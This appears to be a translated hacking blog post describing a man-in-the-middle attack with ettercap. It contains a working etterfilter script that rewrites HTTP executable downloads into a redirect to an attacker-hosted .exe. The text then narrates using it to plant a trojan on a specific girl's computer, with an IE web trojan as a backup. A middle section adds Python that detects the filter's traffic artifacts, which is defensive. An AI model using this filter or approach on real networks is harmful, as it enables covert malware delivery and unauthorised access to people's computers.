Only opened ettercap in preparation for a man-in-the-middle attack.
First, create a new filter rule:
# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close ");
   replace("Keep-Alive", "close ");
}
if (ip.proto == TCP && search(DATA.data, ": application")) {
   # enable for logging
   log(DECODED.data, "/tmp/log.log");
   msg("found EXE\n");
   # "Win32" is the first part of the exe example:
   # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
   if (search(DATA.data, "Win32")) {
      msg("doing nothing\n");
   } else {
      replace("200 OK", "301 Moved Permanently
Location: http://www.xxx.com/exe.exe
");
      msg("redirect success\n");
   }
}
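From the defender's side, the filter above leaves recognisable artifacts in the HTTP stream: the client's Accept-Encoding header turned into Accept-Rubbish!, and a 3xx status line patched onto a response whose remaining headers still describe the original binary. The check below is an added example (not code from the original post); the two sample flows and the host names in them are constructed, with the page's own www.xxx.com placeholder as the redirect target.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample traffic (not from the original post): the first flow is a
# request/response pair as the filter leaves it on the wire, the second is benign.
SAMPLE_FLOWS = [
    {
        "request": ("GET /tools/setup.exe HTTP/1.1\r\nHost: download.example\r\n"
                    "Accept-Rubbish!: gzip, deflate\r\nConnection: keep-alive\r\n\r\n"),
        "response": ("HTTP/1.1 301 Moved Permanently\r\nLocation: http://www.xxx.com/exe.exe\r\n"
                     "Content-Type: application/octet-stream\r\nContent-Length: 1048576\r\n\r\n"),
    },
    {
        "request": "GET /index.html HTTP/1.1\r\nHost: www.example\r\nAccept-Encoding: gzip, deflate\r\n\r\n",
        "response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 12\r\n\r\n<html></html>",
    },
]

def parse_message(msg: str) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP message into its start line and a lower-cased header map."""
    head = msg.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def filter_indicators(flow: Dict[str, str]) -> List[str]:
    """Return the artifacts of the EXE-replacement filter visible in one request/response pair."""
    findings: List[str] = []
    _, req_headers = parse_message(flow["request"])
    status_line, resp_headers = parse_message(flow["response"])
    # 1. The client's Accept-Encoding was overwritten so the server sends plain, searchable bytes.
    if "accept-rubbish!" in req_headers:
        findings.append("Accept-Encoding rewritten to Accept-Rubbish!")
    match = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    status = int(match.group(1)) if match else 0
    content_type = resp_headers.get("content-type", "")
    location = resp_headers.get("location", "")
    # 2. Only the status line was patched, so the binary's own headers survive on a redirect.
    if 300 <= status < 400 and content_type.startswith("application/"):
        findings.append(f"{status} redirect still carries Content-Type {content_type}")
    # 3. The injected Location points straight at an executable.
    if 300 <= status < 400 and location.lower().endswith(".exe"):
        findings.append(f"redirect target is an executable: {location}")
    return findings
```

Run over a proxy or IDS capture, any flow with a non-empty result is worth a closer look; a redirect that still advertises a megabyte of application/octet-stream is not something a real web server produces.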
Then change the download address inside it,
then compile it,
then start the spoofing.
Whatever the girl downloads will be replaced with our trojan; once she runs it we get access (the trojan has to evade antivirus first, of course).
Something like this:
So when the girl downloads something and runs our program, she gets compromised.
At the same time Only used another attack method (in case the girl did not take the bait).
Since we had learned earlier that the girl uses XP, Only generated a web trojan targeting the IE browser.